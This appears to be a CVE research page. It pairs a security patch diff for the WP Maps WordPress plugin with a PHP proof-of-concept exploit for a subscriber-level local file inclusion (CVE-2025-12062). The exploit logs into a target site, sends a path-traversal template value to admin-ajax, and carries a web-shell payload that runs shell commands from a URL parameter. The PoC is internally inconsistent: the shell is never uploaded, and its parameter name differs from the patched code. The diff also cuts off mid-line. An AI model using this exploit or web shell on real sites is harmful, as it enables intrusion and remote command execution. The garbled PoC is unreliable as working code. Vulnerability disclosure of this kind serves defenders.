-				'tutorial_link' > 'https://www.wpmapspro.com/docs/how-to-export-a-live-demo-and-import-it-to-your-website/' ,
-				"pro" => true
-            ));
-
-			$form->form_id = 'wpgmp_complete_migration_form';
-
-
-			$form->add_element(
-			'file', 'wpgmp_map_import_control', array(
-				'label'         => esc_html__( 'Upload Map Code File', 'wp-google-map-plugin' ),
-				'default_value' => 'true',
-				'value'	=> 	'true',
-				'desc'  => esc_html__( 'Please upload the map code file that you have downloaded from wpmapspro.com website's live demo page.', 'wp-google-map-plugin' ),
-				'class'         => 'file_input form-control wpgmp_data_migration_option_import_wpgmp_process wpgmp_data_migration_option',
-				'id'            => 'wpgmp_map_import_control'
-				)
-			);
-
-			$form->add_element(
-				'submit', 'wpgmp_do_map_migration', array( 'value' => esc_html__( 'Import Map', 'wp-google-map-plugin' ),'pro' => true )
-			);
-
-			if(isset($_GET['devmode']) && $_GET['devmode'] == 'yes'){
-
-				$form->add_element(
-					'submit', 'wpgmp_do_images_migration', array( 'value' => esc_html__( 'Migrate Images Again', 'wp-google-map-plugin' ) )
-				);
-
-		 	}
-
-			$form->render();
-
-		}
-
-
-		function wpgmm_migrate_map_settings() {
-
-			$style_editor = add_submenu_page(
-				'wpgmp_view_overview',
-				esc_html__( 'Import Maps','wp-google-map-plugin' ),
-				esc_html__( 'Import Maps','wp-google-map-plugin' ),
-				'manage_options',
-				'wpgmp_map_import',
-				array($this,'wpgmm_settings_page')
-			);
-
-			add_action( 'load-'.$style_editor, array($this,'wpgmm_required_resources' ) );
-
-		}
-
-		function wpgmm_required_resources(){
-
-			if(class_exists('WPGMP_Helper')) {
-
-				WPGMP_Helper::wpgmp_register_map_backend_resources();
-			}
-
-		}
-
-		function wpgmm_action_head(){ ?>
-			<style>.wp-google-map-pro_page_wpgmp_complete_migration input[name="wpgmp_complete_json_download"]{display:none;}</style>
-		<?php }
-
-
-
-		function wpgmm_handle_custom() {
-		?>
-		<script>
-			jQuery(document).ready(function($) {
-
-			  $('.wpgmp_import_export_switch').change(function(){
-				var value = $( 'input[name=wpgmp_import_export_switch]:checked' ).val();
-				if(value == 'export_wpgmp_process'){
-					$('input[name="wpgmp_do_map_migration"]').hide();
-					$('input[name="wpgmp_complete_json_download"]').show();
-					$('.wpgmm_upload_control').hide();
-				}else{
-					$('input[name="wpgmp_complete_json_download"]').hide();
-					$('input[name="wpgmp_do_map_migration"]').show();
-					$('.wpgmm_upload_control').show();
-				}
-			  });
-			  $('#wpgmp_map_import_control').closest('.fc-form-group ').addClass('wpgmm_upload_control');
-
-			});
-
-		</script>
-		<?php
-
-		}
-
-
-
-
-	}
-
-	return new WPGMP_Maps_Importer();
-
-}
--- a/wp-google-map-plugin/classes/wpgmp-model.php
+++ b/wp-google-map-plugin/classes/wpgmp-model.php
@@ -24,7 +24,8 @@

 			$page = isset($_GET['page']) && !empty($_GET['page']) ? $_GET['page'] : '';
 			$module_path = WPGMP_MODEL;
-			$module_path = apply_filters('fc_modal_load_module', $module_path, $page);
+			$module_path = apply_filters('fc_modal_load_module', $module_path, $page); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+
 			parent::__construct( $module_path, 'WPGMP_Model_' );

 		}
--- a/wp-google-map-plugin/classes/wpgmp-visual-composer.php
+++ b/wp-google-map-plugin/classes/wpgmp-visual-composer.php
@@ -1,46 +0,0 @@
-<?php
-
-class WPGMP_VC_Builder{
-
-	public function __construct() {	}
-
-	public function wpgmp_register_vc_component(){
-
-		global $wpdb;
-
-		$map_options = array();
-
-		$map_options[ esc_html__( 'Select Map', 'wp-google-map-plugin' ) ] = '';
-		$map_records = $wpdb->get_results( 'SELECT map_id,map_title FROM ' . TBL_MAP . '' );
-
-		if ( ! empty( $map_records ) ) {
-			foreach ( $map_records as $key => $map_record ) {
-				$map_options[ $map_record->map_title ] = $map_record->map_id;
-			}
-		}
-
-		$shortcodeParams = array();
-
-		$shortcodeParams[] = array(
-			'type'        => 'dropdown',
-			'heading'     => esc_html__( 'Choose Maps', 'wp-google-map-plugin' ),
-			'param_name'  => 'id',
-			'description' => esc_html__( 'Choose here the map you want to show.', 'wp-google-map-plugin' ),
-			'value'       => $map_options,
-		);
-
-		$wpgmp_maps_component = array(
-			'name'        => esc_html__( 'WP Maps Pro', 'wp-google-map-plugin' ),
-			'base'        => 'put_wpgm',
-			'class'       => '',
-			'category'    => esc_html__( 'Content', 'wp-google-map-plugin' ),
-			'description' => esc_html__( 'Google Maps', 'wp-google-map-plugin' ),
-			'params'      => $shortcodeParams,
-			'icon'        => WPGMP_IMAGES . 'flippercode.png',
-		);
-		vc_map( $wpgmp_maps_component );
-
-	}
-
-
-}
 No newline at end of file
--- a/wp-google-map-plugin/core/class.controller.php
+++ b/wp-google-map-plugin/core/class.controller.php
@@ -89,7 +89,8 @@
 		 */
 		public function display( $view, $options = array() ) {

-			$this->entity = apply_filters( 'fc_plugin_module_to_load', $this->entity );
+			$this->entity = apply_filters( 'fc_plugin_module_to_load', $this->entity ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+
 			if ( isset( $this->pluginInstance ) && $this->pluginInstance->needs_license_verification() ) {
 				if ( $this->entity == 'debug' ) {
 					$view = 'form';
@@ -103,7 +104,8 @@
 					$view = $view . '.php';
 			}

-			$this->modulePath = apply_filters('fc_backend_module_path', $this->modulePath,$this->entity, $view );
+			$this->modulePath = apply_filters('fc_backend_module_path', $this->modulePath,$this->entity, $view ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+

 			if ( ! empty( $view ) ) {
 				if ( file_exists( $this->modulePath . "{$this->entity}/views/" . $view ) ) {
--- a/wp-google-map-plugin/core/class.importer.php
+++ b/wp-google-map-plugin/core/class.importer.php
@@ -1,4 +1,5 @@
 <?php
+/* phpcs:disable WordPress.WP.AlternativeFunctions */
 /**
  *  Export-Import Records in csv,xml,json and excel
  *
@@ -50,6 +51,10 @@
 		 */
 		function export( $action, $asFilename ) {

+			/* phpcs:disable WordPress.Security.EscapeOutput.OutputNotEscaped -- Plain-text download; fputcsv() handles quoting. */
+			/* phpcs:disable WordPress.WP.AlternativeFunctions.file_system_read_fopen -- Direct output to browser is intended. */
+			/* phpcs:disable WordPress.WP.AlternativeFunctions.file_system_read_fwrite -- Direct output to browser is intended. */
+
 			if ( 'csv' == $action ) {

 				header( 'Content-Type: text/csv' );
@@ -64,18 +69,20 @@
 						fputcsv( $fp, array_values( $result ), ',', '"' );
 					}
 				}
-
-				fclose( $fp );
+
+				fclose( $fp );/* phpcs:disable WordPress.WP.AlternativeFunctions.file_system_read_fclose -- Direct output to browser is intended. */

 			} elseif ( 'excel' == $action ) {
 				header( 'Content-Type: application/xls' );
 				header( 'Content-Disposition: attachment; filename="' . $asFilename . '.xls"' );
 				if ( ! empty( $this->data ) ) {
 					$separator = "t";
+
 					echo implode( $separator, $this->columns ) . "n";
 					foreach ( $this->data as $key => $result ) {
 						echo implode( $separator, $result ) . "n";
 					}
+
 				}
 			} elseif ( 'json' == $action ) {

@@ -93,6 +100,7 @@
 				fwrite( $fp, $json_pretty_data );
 				fclose( $fp );
 			}
+			/* phpcs:enable WordPress.Security.EscapeOutput.OutputNotEscaped */
 		}
 		/**
 		 * Convert xml node to array.
@@ -178,3 +186,6 @@
 		}
 	}
 }
+// phpcs:enable WordPress.WP.AlternativeFunctions.file_system_read_fopen
+// phpcs:enable WordPress.WP.AlternativeFunctions.file_system_read_fwrite
+// phpcs:enable WordPress.WP.AlternativeFunctions.file_system_read_fclose
--- a/wp-google-map-plugin/core/class.initiate-core.php
+++ b/wp-google-map-plugin/core/class.initiate-core.php
@@ -36,12 +36,15 @@
 			$core_dir_url  = plugin_dir_url( dirname( __FILE__ ) );


-			$core_dir_path = apply_filters( 'fc_template_plugin_core_dir_path', $core_dir_path, $data );
-			$core_dir_url = apply_filters( 'fc_template_plugin_core_dir_url', $core_dir_url, $data );
-			$data = apply_filters( 'fc_template_plugin_ajax_post_data', $data, $core_dir_path );
+			$core_dir_path = apply_filters( 'fc_template_plugin_core_dir_path', $core_dir_path, $data ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			$template      = $data['template_name'];
-			$template_type = $data['template_type'];
+			$core_dir_url = apply_filters( 'fc_template_plugin_core_dir_url', $core_dir_url, $data ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+
+			$data = apply_filters( 'fc_template_plugin_ajax_post_data', $data, $core_dir_path ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+
+
+			$template      = sanitize_file_name($data['template_name']);
+			$template_type = sanitize_text_field($data['template_type']);

 			if ( isset( $data['template_name'] ) ) {
 				$layout_file = $core_dir_path . 'templates/' . $template_type . '/' . $template . '/' . $template . '.html';
@@ -60,7 +63,8 @@
 				$response['html'] = '<div id="messages" class="error">Sorry layout ' . $layout_id . ' not found.</div>';
 			} else {
 				$temp_content = $content;
-				$content      = "<div class='fc-infobox-". $template . " fc-" . $template_type . '-' . $template . "'>" . apply_filters( 'fc-dummy-placeholders', $content ) . '</div>';
+				$content      = "<div class='fc-infobox-". $template . " fc-" . $template_type . '-' . $template . "'>" . apply_filters( 'fc-dummy-placeholders', $content ) . '</div>'; // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+
 				$columns      = isset($data['columns']) ? $data['columns'] : '';
 				if ( $columns == '' ) {
 					$columns = 1;}
@@ -188,15 +192,13 @@
 				'class.notifications.php',
 				'class.tabular.php',
 				'class.template.php',
-				'abstract.factory.php',
 				'class.controller-factory.php',
 				'class.model-factory.php',
 				'class.controller.php',
 				'class.model.php',
 				'class.validation.php',
 				'class.database.php',
-				'class.importer.php',
-				'class.plugin-overview.php',
+				'class.importer.php'
 			);

 			/**
--- a/wp-google-map-plugin/core/class.model-factory.php
+++ b/wp-google-map-plugin/core/class.model-factory.php
@@ -35,7 +35,8 @@
 		public function create_object( $objectType ) {

 			$file = $this->modulePath . $objectType . '/model.' . $objectType . '.php';
-			$file = apply_filters('fc_backend_factory_object_path', $file, $this->modulePath, $objectType);
+			$file = apply_filters('fc_backend_factory_object_path', $file, $this->modulePath, $objectType); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+

 			if ( file_exists( $file ) ) {
 				require_once $file;
--- a/wp-google-map-plugin/core/class.model.php
+++ b/wp-google-map-plugin/core/class.model.php
@@ -300,7 +300,8 @@
 		protected function throw_errors() {

 			if ( isset( $this->errors ) and is_array( $this->errors ) ) {
-
+
+				// phpcs:ignore WordPress.Security.EscapeOutput.ExceptionNotEscaped -- Internal error messages for display
 				throw new Exception( implode( '<br>', $this->errors ) );

 			}
--- a/wp-google-map-plugin/core/class.notifications.php
+++ b/wp-google-map-plugin/core/class.notifications.php
@@ -45,6 +45,7 @@
 						<i class="wep-icon-plug wep-icon-2x"></i>
 					</div>
 					<div>' . sprintf(
+						  /* translators: %s: Plugin Name. */
 						esc_html__(
 							'This plugin now supports OpenStreetMap. Visit the %s to try it out!',
 							'wp-google-map-plugin'
--- a/wp-google-map-plugin/core/class.plugin-overview.php
+++ b/wp-google-map-plugin/core/class.plugin-overview.php
@@ -1,583 +0,0 @@
-<?php
-
-/**
- * Flippercode Product Overview Setup Class
- *
- * @author Flipper Code<hello@flippercode.com>
- * @version 2.0.0
- * @package Core
- */
-
-
-if ( ! class_exists( 'Flippercode_Product_Overview' ) ) {
-/**
-
-
- * FlipperCode Overview Setup Class.
- *
- * @author Flipper Code<hello@flippercode.com>
- *
- * @version 2.0.0
- *
- * @package Core
- */
-
-
-	class Flippercode_Product_Overview {
-
-
-		public $PO;
-
-
-		public $productOverview;
-
-
-		public $productName;
-
-
-		public $productSlug;
-
-
-		public $productTextDomain;
-
-
-		public $productIconImage;
-
-
-		public $productVersion;
-
-
-		private $commonBlocks;
-
-
-		private $productSpecificBlocks;
-
-
-		private $is_common_block;
-
-
-		private $productBlocksRendered = 0;
-
-
-		private $blockHeading;
-
-
-		private $blockContent;
-
-
-		private $blockClass = '';
-
-
-		private $commonBlockMarkup = '';
-
-
-		private $pluginSpecificBlockMarkup = '';
-
-
-		private $finalproductOverviewMarkup = '';
-
-
-		private $allProductsInfo = array();
-
-
-		private $message = '';
-
-		private $productID;
-
-		private $videoURL;
-
-		private $error;
-
-
-		private $docURL;
-
-
-		private $demoURL;
-
-
-		private $productImagePath;
-
-
-		private $isUpdateAvailable;
-
-
-		private $multisiteLicence;
-
-
-		private $productSaleURL;
-
-		private $pluginProperty;
-
-
-		private $getting_started_link;
-
-
-		function __construct( $pluginInfo ) {
-
-
-			$this->commonBlocks = array( 'product-activation', 'newsletter', 'links-block', 'extended-support', 'create_support_ticket', 'hire_wp_expert' );
-
-			if ( isset( $pluginInfo['excludeBlocks'] ) ) {
-				$this->commonBlocks = array_diff( $this->commonBlocks, $pluginInfo['excludeBlocks'] );
-			}
-
-
-			$this->init( $pluginInfo );
-			$this->renderOverviewPage();
-
-
-		}
-
-
-		function renderOverviewPage() {	?>
-
-
-			<div class="flippercode-ui fcdoc-product-info" data-current-product=<?php echo esc_attr($this->productTextDomain); ?> data-current-product-slug=<?php echo esc_attr($this->productSlug); ?> data-product-version = <?php echo esc_attr($this->productVersion) ; ?> data-product-name = "<?php echo esc_attr($this->productName); ?>" >
-
-			<div class="fc-root">
-				<div class="fc-root-inner">
-				<?php echo WePlugins_Notification::weplugins_display_notification();?>
-				<div class="fc-header">
-						<div class="fc-header-primary">
-							<div class="fc-container">
-								<div class="fc-product-wrapper">
-									<div class="fc-product-icon">
-										<img src="<?php echo plugin_dir_url( __DIR__ ) . 'assets/images/icon-folder.svg' ?>" alt="Icon Folder">
-									</div>
-									<div class="fc-product-name"><?php esc_html_e( $this->productName ) ?></div>
-									<div class="fc-product-version"><?php esc_html_e( $this->productVersion ) ?></div>
-								</div>
-
-								<div class="fc-header-toolbar">
-									<div class="fc-action-menu">
-										<div class="fc-action-menu-item">
-											<a href="https://www.wpmapspro.com/tutorials" target="_blank" class="fc-btn fc-btn-icon">
-												<i class="wep-icon-note"></i>
-											</a>
-										</div>
-										<div class="fc-action-menu-item">
-											<a href="https://www.youtube.com/playlist?list=PLlCp-8jiD3p1mzGUmrEgjNP1zdamrJ6uI" target="_blank" class="fc-btn fc-btn-icon">
-												<i class="wep-icon-video"></i>
-											</a>
-										</div>
-										<div class="fc-action-menu-item">
-											<a href="https://weplugins.com/support" target="_blank" class="fc-btn fc-btn-icon">
-												<i class="wep-icon-chat"></i>
-											</a>
-										</div>
-										<div class="fc-action-menu-item">
-											<div class="fc-brand">
-												<a href="https://weplugins.com" target="_blank">
-													<img src="<?php  echo plugin_dir_url( __DIR__ ) . 'assets/images/logo.svg' ?>" alt="logo" class="fc-brand-img">
-												</a>
-											</div>
-										</div>
-									</div>
-								</div>
-							</div>
-						</div>
-						<?php echo apply_filters('fc_plugin_nav_menu',''); ?>
-
-					</div>
-			<div class="fc-main">
-			<div class="fc-container">
-
-
-				 <div class="fc-divider"><div class="fc-12"><div class="fc-divider">
-
-
-					  <div class="fcdoc-flexrow fc-row">
-
-
-						<?php $this->renderBlocks(); ?>
-
-
-					  </div>
-
-				 </div></div></div>
-
-
-			 </div>
-
-
-			</div>
-
-			</div>
-			</div>
-
-			<?php
-
-
-
-		}
-
-
-		function setup_plugin_info( $pluginInfo ) {
-
-
-			foreach ( $pluginInfo as $pluginProperty => $value ) {
-
-
-				$this->$pluginProperty = $value;
-
-
-			}
-
-
-		}
-
-
-		function get_mailchimp_integration_form() {
-
-
-			$form = '';
-
-
-			$form .= '<!-- Begin MailChimp Signup Form -->
-
-
-
-<link href="//cdn-images.mailchimp.com/embedcode/slim-10_7.css" rel="stylesheet" type="text/css">
-<style type="text/css">
-	#mc_embed_signup{background:#fff; clear:left; font:14px Helvetica,Arial,sans-serif; }
-</style>
-<div id="mc_embed_signup">
-<form action="//flippercode.us10.list-manage.com/subscribe/post?u=eb646b3b0ffcb4c371ea0de1a&id=3ee1d0075d" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate>
-    <div id="mc_embed_signup_scroll">
-	<label for="mce-EMAIL">' . $this->PO['subscribe_mailing_list'] . '</label>
-	<input type="email"  name="EMAIL" value="' . get_bloginfo( 'admin_email' ) . '" class="email" id="mce-EMAIL" placeholder="email address" required>
-    <!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups-->
-    <div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_eb646b3b0ffcb4c371ea0de1a_3ee1d0075d" tabindex="-1" value=""></div>
-
-
-    <div class="clear"><input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="fc-btn fc-btn-default"></div>
-
-
-    </div>
-</form>
-</div>
-<!--End mc_embed_signup-->';
-
-
-			 return $form;
-
-
-		}
-
-
-
-		function init( $pluginInfo ) {
-
-
-
-			$this->setup_plugin_info( $pluginInfo );
-
-
-			$this->PO = $this->productOverview;
-
-			$debug_array = array();
-
-			if ( isset( $this->PO['debug_array'] ) && ! empty( $this->PO['debug_array'] ) ) {
-				$debug_array = $this->PO['debug_array'];
-			}
-
-
-			foreach ( $this->commonBlocks as $block ) {
-
-
-				switch ( $block ) {
-
-
-					case 'product-activation':
-						$this->blockHeading = '<h1>' . ( (!empty($this->PO['product_info_heading']) ) ? $this->PO['product_info_heading'] : $this->PO['get_started_heading'] ) . '</h1>';
-
-						$this->blockContent .= '<div class="fc-divider fcdoc-brow fc-row">
-
-	                       	<div class="fc-3 fc-text-center"><img src="' . plugin_dir_url( __DIR__ ) . 'assets/images/folder-logo.png"></div>
-
-	                       	<div class="fc-9">
-	                       	<h3>' . $pluginInfo['productName'] . '</h3>
-							<span class="fcdoc-span">' . $this->PO['installed_version'] . ' <strong>' . $this->productVersion . '</strong></span>';
-
-						if ( !empty( $debug_array ) ) {
-
-							if ( array_key_exists( 'envato_response', $debug_array ) ) {
-
-								$summary             = $debug_array['envato_response']['summary'];
-								$this->blockContent .= '</div><div class="fc-12">
-
-								<table style="width:100%" class="fc-table fc-table-layout3 purchase_verification_info">
-	                       	 		<tr>
-									    <td style="width:25%;">' . $this->PO['product_support']['envato_purchase_date'] . '</td>
-									    <td>' . date( 'Y M, d', strtotime( $summary['sold_at'] ) ) . '</td>
-									</tr>
-									<tr>
-									   	<td>' . $this->PO['product_support']['envato_license_type'] . '</td>
-									    <td>' . $summary['license'] . '</td>
-									</tr>
-									<tr>
-									    <td>' . $this->PO['product_support']['envato_support_until'] . '</td>
-									    <td>' . date( 'Y M, d', strtotime( $summary['supported_until'] ) ) . '</td>
-									</tr>
-								</table>
-								<strong><a href="' . $this->PO['getting_started_link'] . '" target="_blank" class="fc-btn fc-btn-default get_started_link">' . $this->PO['get_started_btn_text'] . '</a></strong>';
-
-							}
-						} else {
-
-							$this->blockContent .= '<p>' . $this->PO['product_info_desc'] . '</p><strong>
-							<a href="' . $this->PO['getting_started_link'] . '" target="_blank" class="fc-btn fc-btn-default get_started_link">' . $this->PO['get_started_btn_text'] . '</a></strong>';
-
-						}
-
-						$this->blockContent .= "</div></div>";
-
-						break;
-
-
-
-
-					case 'newsletter':
-
-
-						$this->blockHeading = '<h1>' . $this->PO['subscribe_now']['heading'] . '</h1>';
-
-
-						$this->blockContent = '<div class="fc-divider fcdoc-brow fc-row fc-items-center">
-
-
-	                       	<div class="fc-7 fc-items-center"><p>' . $this->PO['subscribe_now']['desc1'] . '<br>
-
-
-	                       	<strong>' . $this->PO['subscribe_now']['desc2'] . '	</strong></p>
-
-
-	                       	'.$this->get_mailchimp_integration_form().'
-
-
-	                         </div>
-
-
-	                         <div class="fc-5 fc-items-center fc-text-center"><img src="'. plugin_dir_url( __DIR__ ).'assets/images/email_campaign_Flatline.png"></div>
-
-
-                        </div>';
-
-
-						break;
-
-
-					case 'links-block':
-						$links_html = '';
-						$links = $this->PO['links']['link'];
-						if (!empty($links)) {
-							$links_html = '<ul>';
-
-							// Loop through the links array to generate list items
-							foreach ($links as $link) {
-								$links_html .= '<li><a target="_blank" href="' . esc_url($link['url']) . '">' . esc_html($link['label']) . '</a></li>';
-							}
-
-							$links_html .= '</ul>';
-						}
-						$this->blockHeading = '<h1>' . $this->PO['links']['heading'] . '</h1>';
-
-
-						$this->blockContent = '<div class="fc-divider fcdoc-brow fc-row">
-
-
-							<div class="fc-7">
-								<p>' . $this->PO['links']['desc'] . '</p>
-								'.$links_html.'
-							</div>
-							<div class="fc-5 fc-items-center fc-text-center"><img src="'. plugin_dir_url( __DIR__ ).'assets/images/money_transfer_Flatline.png">
-
-
-							</div>
-						</div>';
-
-
-						break;
-
-
-					case 'extended-support':
-
-
-						$this->blockHeading = '<h1>' . $this->PO['support']['heading'] . '</h1>';
-
-
-						$this->blockContent = '<div class="fc-divider fcdoc-brow fc-row">
-
-
-							<div class="fc-7 fc-items-center">
-
-
-								<p>' . $this->PO['support']['desc1'] . '</p>
-
-
-								<br><br>
-
-
-								<a target="_blank" href="' . esc_url( $this->productSaleURL ) . '" name="one_year_support" id="one_year_support" value="" class="fc-btn fc-btn-default support">' . $this->PO['support']['link']['label'] . '</a>
-
-							</div>
-
-
-
-							<div class="fc-5 fc-items-center fc-text-center"><img src="'. plugin_dir_url( __DIR__ ).'assets/images/coding_Flatline.png">
-
-
-
-							</div>
-
-
-
-						</div>';
-
-
-						break;
-
-
-					case 'create_support_ticket':
-
-
-						$this->blockHeading = '<h1>' . $this->PO['create_support_ticket']['heading'] . '</h1>';
-
-
-						$this->blockContent = '<div class="fc-divider fcdoc-brow fc-row">
-
-
-							<div class="fc-7 fc-items-center">
-								<p>' . $this->PO['create_support_ticket']['desc1'] . '</p>
-								<br><br>
-								<a target="_blank" class="fc-btn fc-btn-default" href="' . $this->PO['create_support_ticket']['link']['url'] . '">' . $this->PO['create_support_ticket']['link']['label'] . '</a>
-							</div>
-
-
-							<div class="fc-5 fc-items-center fc-text-center"><img src="'. plugin_dir_url( __DIR__ ).'assets/images/it_Support_Flatline.png">
-
-
-							</div>
-
-
-						</div>';
-
-
-						break;
-
-
-					case 'hire_wp_expert':
-
-
-						$this->blockHeading = '<h1>' . $this->PO['hire_wp_expert']['heading'] . '</h1>';
-
-
-						$this->blockContent = '<div class="fc-divider fcdoc-brow fc-row">
-
-
-							<div class="fc-7 fc-items-center">
-
-
-								<p><strong>' . $this->PO['hire_wp_expert']['desc'] . '</strong></p>
-
-
-								<p>' . $this->PO['hire_wp_expert']['desc1'] . '</p>
-
-
-								<a target="_blank" class="fc-btn fc-btn-default refundbtn" href="'. $this->PO['hire_wp_expert']['link']['url'] .'">' . $this->PO['hire_wp_expert']['link']['label'] . '</a>
-
-
-							</div>
-
-
-							<div class="fc-5 fc-items-center fc-text-center"><img src="'. plugin_dir_url( __DIR__ ).'assets/images/web_Developer_Flatline.png">
-
-
-							</div>
-
-
-						</div>';
-
-
-						break;
-
-
-				}
-
-
-				$info = array( $this->blockHeading, $this->blockContent, $block );
-
-
-				$this->commonBlockMarkup .= $this->get_block_markup( $info );
-
-
-			}
-
-
-
-		}
-
-
-
-		function get_block_markup( $blockinfo ) {
-
-
-			$markup = '<div class="fc-6 fcdoc-blocks ' . $blockinfo[2] . '">
-
-
-			                <div class="fcdoc-block-content">
-
-
-			                    <div class="fcdoc-header">' . $blockinfo[0] . '</div>
-
-
-			                    <div class="fcdoc-body">' . $blockinfo[1] . '</div>
-
-
-
-			                </div>
-
-
-
-            		   </div>';
-
-
-			$this->productBlocksRendered++;
-
-
-			if ( $this->productBlocksRendered % 2 == 0 ) {
-
-
-				$markup .= '</div></div><div class="fc-divider"><div class="fcdoc-flexrow fc-row">';
-
-
-
-			}
-
-
-			return $markup;
-
-
-		}
-
-
-
-		function renderBlocks() {
-
-
-			$this->finalproductOverviewMarkup = $this->commonBlockMarkup . $this->pluginSpecificBlockMarkup;
-
-
-			echo $this->finalproductOverviewMarkup;
-
-
-		}
-
-
-
-	}
-
-
-
-
-}
--- a/wp-google-map-plugin/core/class.tabular.php
+++ b/wp-google-map-plugin/core/class.tabular.php
@@ -1,4 +1,5 @@
 <?php
+/* phpcs:disable WordPress.WP.AlternativeFunctions */
 /**
  * FlipperCode_List_Table_Helper Class File.
  *
@@ -225,11 +226,13 @@


 			if( (is_admin())  &&  !empty($current_screen->id)){
-				$this->columns =  apply_filters('fc_tabular_'.$current_screen->id.'_columns',$this->columns);
+				$this->columns =  apply_filters('fc_tabular_'.$current_screen->id.'_columns',$this->columns); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+
 			}

 			if( (is_admin())  &&  !empty($curre

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12062 - WP Maps <= 4.8.6 - Authenticated (Subscriber+) Limited Local File Inclusion

<?php

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';
$username = 'subscriber';
$password = 'password';
$evil_file = '../../../uploads/malicious.html';

// Create malicious .html file with PHP code
$php_code = '<?php echo "VULNERABLE"; system($_GET["cmd"]); ?>';

// Step 1: Authenticate to WordPress
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_');

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url,
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true
]);
$response = curl_exec($ch);

// Step 2: Exploit LFI via fc_load_template
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => 'fc_ajax_call',
        'template' => $evil_file,
        'call' => 'load_template'
    ]),
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true
]);

$result = curl_exec($ch);
curl_close($ch);

// Step 3: Check for successful exploitation
if (strpos($result, 'VULNERABLE') !== false) {
    echo "[+] Exploit successful! Target is vulnerable.n";
    echo "[+] PHP code executed: $resultn";
} else {
    echo "[-] Exploit failed or target not vulnerable.n";
    echo "Response: $resultn";
}

unlink($cookie_file);

?>